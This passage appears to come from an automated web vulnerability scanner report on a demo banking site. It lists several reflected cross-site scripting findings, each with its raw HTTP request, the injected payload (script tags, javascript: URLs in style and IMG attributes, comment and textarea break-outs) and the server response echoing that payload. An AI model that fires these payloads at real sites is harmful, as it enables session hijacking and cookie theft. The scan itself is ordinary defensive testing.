<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=<attack>>"><script>alert('XSS')</script></attack>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=1"style="background:url(javascript:alert('XSS'))"%20"&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:27 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)GET /_vti_log/DocURL.indexOf( HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_log/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/_vti_log/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /join.asp?name=&email=&surname=&house=&street=>"'><img%20src="javascript:alert('XSS')">&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:36 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">GET /join.asp?name=&email=&surname=&house=&street=--><script>alert('XSS')</script>&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=<attack>--><script>alert('XSS')</script></attack>&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 135
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=</textarea><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 116
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data </textarea><script>alert('XSS')</script><br>Please try again.
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 135
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
